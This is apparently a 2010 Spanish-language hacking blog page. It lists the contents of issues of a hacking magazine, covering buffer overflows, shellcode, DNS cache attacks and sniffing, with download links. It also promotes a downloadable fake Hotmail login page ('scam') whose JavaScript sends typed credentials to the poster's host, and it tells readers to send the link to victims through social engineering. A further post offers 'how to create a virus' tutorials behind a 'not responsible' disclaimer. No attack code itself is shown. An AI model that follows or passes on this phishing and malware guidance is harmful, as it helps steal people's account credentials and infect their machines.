
Cuaderno 23:

-Como explotar fallos Buffer Overflow
-Curso de TCP/IP: ICMP (protocolo de mensajes de control de internet)
-Diseño de cortafuegos (parte II)

Cuaderno 24:

-Los bugs y los exploits, esos pequeños bichos y diablos
-Curso de TCP/IP: La capa IP primera parte. Las direcciones IP
-Hacking de Linux
-Diseño de cortafuegos de red con iptables (3ª parte del curso de firewalls)

Cuaderno 25:

-Los bugs y los exploits, esos pequeños bichos y diablos, segunda parte
-Vulnerabilidades Web, atacando la sesion de usuario
-Curso de TCP IP: La capa IP, segunda parte, (los datagramas)

Cuaderno 26:

-Sombras en internet: sniffando la red - formas de deteccion
- utilidades para la deteccion -ethereal: descripcion. Capturando trafico. Estableciendo filtros. Capturando informacion sensible. Telnet vs Secure shell
-Atacando la cacha DNS
-Curso de TCP IP: La capa IP 3ª parte: fragmentacion de datagramas

Cuaderno 27:

-Taller de Python "episodio 1"
-Taller de Criptografia - El sistema PGP
-Curso de TCP IP: proteccion con iptables, en una red corporativa
-Buffer Overflow-Hackeando el nucleo

Cuaderno 28:

-Hacking Estragegia, capitulo 1
-Curso de Python, capitulo 2
-Investigacion, poniendo a prueba el antivirus
-Explotando Heap/BSS Overflows, capitulo 2
-Programacion, curso de C, capitulo 1
-Taller de criptografia, capitulo 2
-La "ley de la mordaza": informar es DELITO

Cuaderno 29:

-Hacking estrategia: infiltracion en una red wireless protegida
-Capitulo III: Taller de criptografia
-Control de Logs en GNU/LINUX
-Explotacion de las Format Strings, capitulo III-Shatter Attacks
-Curso de C, capitulo II
-FAQ, curiosidades de Gmail/Google

Cuaderno 30:

-Taller de criptografIa, capitulo IV
-Ataques a formularios web-Los secretos del protocolo SOCKS
-Creamos una Shellcode paso a paso
-Capitulo III: Curso de C: Punteros y Arrays
-Hack mundial

Enlances:

http://www.mediafire.com/?zydtmt3mbhd
http://www.mediafire.com/?m2ldz1wm2yz
http://www.mediafire.com/?zkzjm1znhog
http://www.mediafire.com/?g04i2nh32iz
http://www.mediafire.com/?nr5oz2ykmd0

SCAM HOTMAIL 2010 By Juanfeuchiha

domingo, 21 de febrero de 2010

Nuevo Scam Hotmail 2010

Funcionamiento:

Un Scam es una página falsa por la cual de un comando java script manda los datos escritos a un servidor host.

Aplicación:

Tendrás que crear una cuenta en un sitio de alojamiento hosting (http://www.t35.com/login)
Después de crear la cuenta tendrás que subir tu scam y enviarle el link del índex ya subido a tus victimas utilizando ingeniería social xD

Para descargar:

Pincha Aquí

jueves, 11 de febrero de 2010

He aqui un "pequeño" Inventario de juegos si desean alguno solo contacteme.
Para descargar el inventario

Hacer Clic Aqui

Para contactarme

juanfele_4682@hotmail.com

COMO CREAR UN VIRUS

Holaaaaaaaaa por primera vez en el blog unos pequeños tutoriales de como hackear fácilmente.

Publico estos tutoriales con fines educativos, no me hago responsable al uso que le den.

Para descargar los Tutos:

Hacer Clic Aqui

Formulario

Si tienes dudas sobre alguno de los programas no duden en informarmelo por medio de este formulario !!! -------------------------------------------------------------------------> PD: Por favor reporten los links rotos para asi arreglarlos y poder mantener limpio el blog ;D

Tu Nombre
Tu Direccion Email
Mensaje